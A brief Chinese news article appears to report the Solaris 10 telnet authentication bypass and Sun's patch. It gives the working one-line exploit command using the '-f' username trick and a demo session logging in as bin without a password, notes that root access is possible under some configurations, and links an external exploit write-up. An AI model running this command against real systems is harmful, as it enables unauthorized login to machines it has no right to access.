【IT168 专稿】早期Solaris 2.6、7 和 8 的 telnetd存在一个漏洞, 可以通过/bin/login的环境变数 TTYPROMPT 绕过验证，导致无需身份认证即可登录。最近，Solaris 10的telnet又被发现出现了漏洞，Sun也及时推出了补丁。

    我们先来看问题的症状。漏洞出现的系统环境为Solaris 10及以后版本，安装时没有选择默认安装。漏洞表现为通过在Solaris的telnet命令的-l选项后指定任意一个“-fusername”参数，就可以直接登录进入Solaris系统。

    命令格式：

    telnet -l "-fbin" target_address

    下面是通过telnet漏洞以bin用户登录系统的演示。

    # telnet -l "-fbin" myhost
    Trying 172.21.60.120...
    Connected to myhost.
    Escape character is ''^]''.
    Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
    $ id -a
    uid=2(bin) gid=2(bin) groups=2(bin),3(sys)

    如果管理员修改了/etc/default/login文件，在注释掉CONSOLE行允许root远程登录的情况下，访问者可以利用该漏洞直接以root登录系统，这样对系统危害更大。

    Kingcope最早给出了在OpenSolaris中发现的该漏洞的源代码，并称其为“0day”－零日漏洞。文章地址为：

    http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

    该文章中提供一个脚本，运行后用户可以获得被登录系统的adm用户权限。